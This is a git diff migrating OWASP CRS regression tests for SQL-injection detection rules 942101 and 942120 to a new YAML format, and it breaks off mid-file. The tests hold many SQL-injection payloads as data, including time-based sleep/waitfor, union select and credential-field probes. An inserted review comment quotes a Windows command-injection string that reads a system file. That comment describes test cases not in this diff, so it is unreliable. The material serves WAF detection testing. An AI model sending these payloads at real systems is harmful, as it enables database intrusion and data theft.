b/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942101.yaml index 37a054a..5af7502 100644 --- a/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942101.yaml +++ b/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942101.yaml 
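Review bot: Test 10 is the only case in the file whose body is not a `var=` parameter: `data: "1'||(select extractvalue(xmltype('%toyop;"`. With a form-encoded body that string becomes the parameter name with an empty value, so the case would exercise the rule on `ARGS_NAMES` rather than `ARGS`, unlike its siblings; if that is deliberate, state it, e.g. `desc: "Advanced SQL injection in the parameter name"`, otherwise prefix the payload with `var=` like the others. None of these POST tests set a `Content-Type`, so which variable the body lands in depends on the test runner's default, which is outside this hunk. Test 13's payload `| type %SystemDrive%\\config.ini |` is an OS command injection string rather than SQL; if 942100 is expected to flag it that is fine, but `desc: "Advanced injection"` should say so.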
@@ -2,182 +2,181 @@ meta: author: "Christian Folini, Matteo Pace, azurit" description: Various SQL injection tests - enabled: true - name: 942101.yaml +rule_id: 942101 tests: - - test_title: 942101-1 + - test_id: 1 desc: "Simple SQL Injection" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post/1234%20OR%201=1" - version: HTTP/1.0 - output: - log_contains: id "942101" - - test_title: 942101-2 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post/1234%20OR%201=1" + version: HTTP/1.0 + output: + log: + expect_ids: [942101] + - test_id: 2 desc: "Basic SQL injection" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post/2010-01-01'+sleep(20.to_i)+'" - version: HTTP/1.0 - output: - log_contains: id "942101" - - test_title: 942101-3 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post/2010-01-01'+sleep(20.to_i)+'" + version: HTTP/1.0 + output: + log: + expect_ids: [942101] + - test_id: 3 desc: "Simple SQL injection" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - 
uri: "/post/EmptyValue'%20and%20526=527" - version: HTTP/1.0 - output: - log_contains: id "942101" - - test_title: 942101-4 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post/EmptyValue'%20and%20526=527" + version: HTTP/1.0 + output: + log: + expect_ids: [942101] + - test_id: 4 desc: "Advanced SQL injection" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post/foo')waitfor%20delay'5%3a0%3a20'--" - version: HTTP/1.0 - output: - log_contains: id "942101" - - test_title: 942101-5 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post/foo')waitfor%20delay'5%3a0%3a20'--" + version: HTTP/1.0 + output: + log: + expect_ids: [942101] + - test_id: 5 desc: "Simple function call" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post/sleep(20)" - version: HTTP/1.0 - output: - log_contains: id "942101" - - test_title: 942101-6 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post/sleep(20)" + version: HTTP/1.0 + output: + log: + expect_ids: [942101] + - test_id: 6 desc: "Advanced 
SQL injection" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post/unittests@coreruleset.org\"%20sleep(10.to_i)%20\"" - version: HTTP/1.0 - output: - log_contains: id "942101" - - test_title: 942101-7 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post/unittests@coreruleset.org\"%20sleep(10.to_i)%20\"" + version: HTTP/1.0 + output: + log: + expect_ids: [942101] + - test_id: 7 desc: "SQL Injection at the last segment of the path (request_basename detection)" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post/foo/24'union+all+select+1,2,3+from+aa" - version: HTTP/1.0 - output: - log_contains: id "942101" - - test_title: 942101-8 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post/foo/24'union+all+select+1,2,3+from+aa" + version: HTTP/1.0 + output: + log: + expect_ids: [942101] + - test_id: 8 desc: "SQL Injection inside the path (request_filename detection)" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: 
"/post/foo/24'union+all+select+1,2,3+from+aa/bar" - version: HTTP/1.0 - output: - log_contains: id "942101" - - test_title: 942101-9 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post/foo/24'union+all+select+1,2,3+from+aa/bar" + version: HTTP/1.0 + output: + log: + expect_ids: [942101] + - test_id: 9 desc: "SQL Injection inside the path with comment block (request_filename detection)" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post/%2A/%2A/2+union+all/bar" - version: HTTP/1.0 - output: - log_contains: id "942101" - - test_title: 942101-10 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post/%2A/%2A/2+union+all/bar" + version: HTTP/1.0 + output: + log: + expect_ids: [942101] + - test_id: 10 desc: "Negative test with incomplete SQL command inside the path" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post/foo/9'union+all/bar" - version: HTTP/1.0 - output: - no_log_contains: id "942101" - - test_title: 942101-11 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: 
"/post/foo/9'union+all/bar" + version: HTTP/1.0 + output: + log: + no_expect_ids: [942101] + - test_id: 11 desc: "Negative test with complete SQL command inside the path, but without comma" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post/foo/24+union+all+select+1,2,3+from+aa/bar" - version: HTTP/1.0 - output: - no_log_contains: id "942101" + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post/foo/24+union+all+select+1,2,3+from+aa/bar" + version: HTTP/1.0 + output: + log: + no_expect_ids: [942101] diff --git a/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942120.yaml b/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942120.yaml index d6f008e..39094ed 100644 --- a/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942120.yaml +++ b/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942120.yaml 
@@ -1,674 +1,671 @@ --- meta: author: "Christian S.J. Peron, Christoph Hansen, Franziska Bühler, azurit" - description: None - enabled: true - name: 942120.yaml +rule_id: 942120 tests: - - test_title: 942120-1 + - test_id: 1 desc: "SQL Injection Attack: SQL Operator Detected" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?var=blahblah&var2=LIKE%20NULL" - version: HTTP/1.0 - output: - log_contains: id "942120" - - test_title: 942120-2 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?var=blahblah&var2=LIKE%20NULL" + version: HTTP/1.0 + output: + log: + expect_ids: [942120] + - test_id: 2 desc: "SQL Injection Attack: SQL Operator Detected" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=RegExp" - version: HTTP/1.0 - output: - log_contains: id "942120" - - test_title: 942120-3 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=RegExp" + version: HTTP/1.0 + output: + log: + expect_ids: [942120] + - test_id: 3 desc: "SQL Injection Attack: SQL Operator Detected" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: 
text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: ">>" - version: HTTP/1.0 - output: - log_contains: id "942120" - - test_title: 942120-4 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: ">>" + version: HTTP/1.0 + output: + log: + expect_ids: [942120] + - test_id: 4 desc: "SQL Injection Attack: SQL Operator Detected" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=%26%26" - version: HTTP/1.0 - output: - log_contains: id "942120" - - test_title: 942120-5 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=%26%26" + version: HTTP/1.0 + output: + log: + expect_ids: [942120] + - test_id: 5 desc: "SQL Injection Attack: SQL Operator Detected" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "<<" - version: HTTP/1.0 - output: - log_contains: id "942120" - - test_title: 942120-6 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 
+ uri: "/post" + data: "<<" + version: HTTP/1.0 + output: + log: + expect_ids: [942120] + - test_id: 6 desc: "SQL Injection Attack: SQL Operator Detected" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "%21%3D" - version: HTTP/1.0 - output: - log_contains: id "942120" - - test_title: 942120-7 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "%21%3D" + version: HTTP/1.0 + output: + log: + expect_ids: [942120] + - test_id: 7 desc: "SQL Injection Attack: SQL Operator Detected" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "||" - version: HTTP/1.0 - output: - log_contains: id "942120" - - test_title: 942120-8 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "||" + version: HTTP/1.0 + output: + log: + expect_ids: [942120] + - test_id: 8 desc: "SQL Injection Attack: SQL Operator Detected" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "XOR" - version: HTTP/1.0 - output: - 
log_contains: id "942120" - - test_title: 942120-9 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "XOR" + version: HTTP/1.0 + output: + log: + expect_ids: [942120] + - test_id: 9 desc: "SQL Injection Attack: SQL Operator Detected" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=%3C%3D" - version: HTTP/1.0 - output: - log_contains: id "942120" - - test_title: 942120-10 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=%3C%3D" + version: HTTP/1.0 + output: + log: + expect_ids: [942120] + - test_id: 10 desc: "SQL Injection Attack: SQL Operator Detected" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "IS NULL" - version: HTTP/1.0 - output: - log_contains: id "942120" - - test_title: 942120-11 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "IS NULL" + version: HTTP/1.0 + output: + log: + expect_ids: [942120] + - test_id: 11 desc: "SQL Injection Attack: SQL Operator Detected" stages: - - 
stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "in (0,1)" - version: HTTP/1.0 - output: - log_contains: id "942120" - - test_title: 942120-12 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "in (0,1)" + version: HTTP/1.0 + output: + log: + expect_ids: [942120] + - test_id: 12 desc: "SQL Injection Attack: SQL Operator Detected" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "in (2147483647,-1)" - version: HTTP/1.0 - output: - log_contains: id "942120" - - test_title: 942120-13 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "in (2147483647,-1)" + version: HTTP/1.0 + output: + log: + expect_ids: [942120] + - test_id: 13 desc: "SQL Injection Attack: SQL Operator Detected" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=%3C%3D%3E" - version: HTTP/1.0 - output: - log_contains: id "942120" - - test_title: 942120-14 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: 
"OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=%3C%3D%3E" + version: HTTP/1.0 + output: + log: + expect_ids: [942120] + - test_id: 14 desc: "SQL Injection Attack: SQL Operator Detected" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "regexp" - version: HTTP/1.0 - output: - log_contains: id "942120" - - test_title: 942120-15 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "regexp" + version: HTTP/1.0 + output: + log: + expect_ids: [942120] + - test_id: 15 desc: "SQL Injection Attack: SQL Operator Detected" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "RLIKE" - version: HTTP/1.0 - output: - log_contains: id "942120" - - test_title: 942120-16 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "RLIKE" + version: HTTP/1.0 + output: + log: + expect_ids: [942120] + - test_id: 16 desc: "SQL Injection Attack: SQL Operator Detected" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: 
text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "<>" - version: HTTP/1.0 - output: - log_contains: id "942120" - - test_title: 942120-17 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "<>" + version: HTTP/1.0 + output: + log: + expect_ids: [942120] + - test_id: 17 desc: "SQL Injection Attack: SQL Operator Detected" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "+in+%28++select+anfrage_id+from+erkenntnisse+where+id+is++not++null++%29%0A" - version: HTTP/1.0 - output: - log_contains: id "942120" - - test_title: 942120-18 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "+in+%28++select+anfrage_id+from+erkenntnisse+where+id+is++not++null++%29%0A" + version: HTTP/1.0 + output: + log: + expect_ids: [942120] + - test_id: 18 desc: "SQL Injection Attack: SQL Operator Detected" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "+IN+%28815914%2C+815913%29%0A" - version: HTTP/1.0 - output: - log_contains: id "942120" - - test_title: 942120-19 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + 
User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "+IN+%28815914%2C+815913%29%0A" + version: HTTP/1.0 + output: + log: + expect_ids: [942120] + - test_id: 19 desc: "SQL Injection Attack: SQL Operator Detected" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "+IN+%28815919%2C+815920%2C+815921%2C+815922%2C+815923%2C+815924%2C+815925%2C+815926%2C+815927%2C+815928%2C+815929%2C+815930%2C+815932%2C+815933%2C+815934%2C+815935%2C+815936%2C+815937%2C+815917%2C+815918%29%0A" - version: HTTP/1.0 - output: - log_contains: id "942120" - - test_title: 942120-20 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "+IN+%28815919%2C+815920%2C+815921%2C+815922%2C+815923%2C+815924%2C+815925%2C+815926%2C+815927%2C+815928%2C+815929%2C+815930%2C+815932%2C+815933%2C+815934%2C+815935%2C+815936%2C+815937%2C+815917%2C+815918%29%0A" + version: HTTP/1.0 + output: + log: + expect_ids: [942120] + - test_id: 20 desc: "SQL Injection Attack: SQL Operator Detected" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay= in ( Aa,- Ab-, and Ac)" - version: HTTP/1.0 - output: - log_contains: id "942120" - - test_title: 942120-21 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP 
CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay= in ( Aa,- Ab-, and Ac)" + version: HTTP/1.0 + output: + log: + expect_ids: [942120] + - test_id: 21 desc: "SQL Injection Attack: SQL Operator Detected" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "%3E%3D" - version: HTTP/1.0 - output: - log_contains: id "942120" - - test_title: 942120-22 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "%3E%3D" + version: HTTP/1.0 + output: + log: + expect_ids: [942120] + - test_id: 22 desc: "SQL Injection Attack: not between * and " stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "select%20*%20from%20user%20where%20password_last_changed%20not%20between%20'2021-04-11'%20and%20'2021-04-11'" - version: HTTP/1.0 - output: - log_contains: id "942120" - - test_title: 942120-23 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "select%20*%20from%20user%20where%20password_last_changed%20not%20between%20'2021-04-11'%20and%20'2021-04-11'" + version: HTTP/1.0 + output: + log: + expect_ids: [942120] + - 
test_id: 23 desc: "SQL Injection Attack: SQL Operator Detected" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "email=z'or%20email%20notnull--" - version: HTTP/1.0 - output: - log_contains: id "942120" - - test_title: 942120-24 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "email=z'or%20email%20notnull--" + version: HTTP/1.0 + output: + log: + expect_ids: [942120] + - test_id: 24 desc: "SQL Injection Attack: SQL Operator Detected" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "email=x'%20or%20username%20like%20totpSecret%20escape%20'x';" - version: HTTP/1.0 - output: - log_contains: id "942120" - - test_title: 942120-25 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "email=x'%20or%20username%20like%20totpSecret%20escape%20'x';" + version: HTTP/1.0 + output: + log: + expect_ids: [942120] + - 